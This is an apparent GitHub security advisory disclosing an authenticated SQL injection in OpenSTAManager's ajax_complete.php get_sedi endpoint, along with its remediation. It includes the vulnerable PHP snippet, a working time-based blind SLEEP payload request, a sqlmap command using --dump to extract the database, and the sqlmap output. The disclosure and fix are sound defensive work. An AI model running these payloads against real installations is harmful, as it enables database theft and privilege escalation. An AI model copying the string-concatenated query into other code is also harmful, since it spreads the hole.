GHSA-w995-ff8h-rppg

Summary

A SQL Injection vulnerability exists in the ajax_complete.php endpoint when handling the get_sedi operation. An authenticated attacker can inject malicious SQL code through the idanagrafica parameter, leading to unauthorized database access.

Proof of Concept

Vulnerable Code

File: modules/anagrafiche/ajax/complete.php:28

case 'get_sedi':
    $idanagrafica = get('idanagrafica');
    $q = "SELECT id, CONCAT_WS( ' - ', nomesede, citta ) AS descrizione 
          FROM an_sedi 
          WHERE idanagrafica='".$idanagrafica."' ...";
    $rs = $dbo->fetchArray($q);

Data Flow

1. Source: $_GET['idanagrafica'] → get('idanagrafica')
2. Vulnerable: User input concatenated directly into SQL query with single quotes
3. Sink: $dbo->fetchArray($q) executes the malicious query

Exploit

Manual PoC (Time-based Blind SQLi):

GET /ajax_complete.php?op=get_sedi&idanagrafica=1' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a) AND '1'='1 HTTP/1.1
Host: localhost:8081
Cookie: PHPSESSID=<valid-session>

<img width="1304" height="580" alt="image" src="https://github.com/user-attachments/assets/4ffcdacf-d56c-4a44-ad95-d6cecd0f05c8" />

SQLMap Exploitation:

sqlmap -u "http://localhost:8081/ajax_complete.php?op=get_sedi&idanagrafica=1*" \
  --cookie="PHPSESSID=<session>" \
  --dbms=MySQL \
  --technique=T \
  --level=3 \
  --dump

SQLMap Output:

[INFO] URI parameter '#1*' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
Parameter: #1* (URI)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: idanagrafica=1' AND (SELECT 2572 FROM (SELECT(SLEEP(5)))oOnc)-- rhVF
back-end DBMS: MySQL >= 5.0.12

<img width="1284" height="745" alt="image" src="https://github.com/user-attachments/assets/5c640132-4f52-46bd-96fa-14d9987d4759" />

Impact

• Data Exfiltration: Complete database extraction including user credentials, customer data, financial records
• Privilege Escalation: Modification of zz_users table to gain admin access
• Data Integrity: Unauthorized modification or deletion of records
• Potential RCE: Via SELECT ... INTO OUTFILE if file permissions allow

Affected Versions

• OpenSTAManager: Verified in latest version (as of December 2025)
• All versions using this endpoint are likely affected

Remediation

Replace direct concatenation with prepared statements:

Before:

$idanagrafica = get('idanagrafica');
$q = "SELECT ... WHERE idanagrafica='".$idanagrafica."' ...";

After:

$idanagrafica = get('idanagrafica');
$q = "SELECT ... WHERE idanagrafica=".prepare($idanagrafica)." ...";

Credit

Discovered by: Łukasz Rybak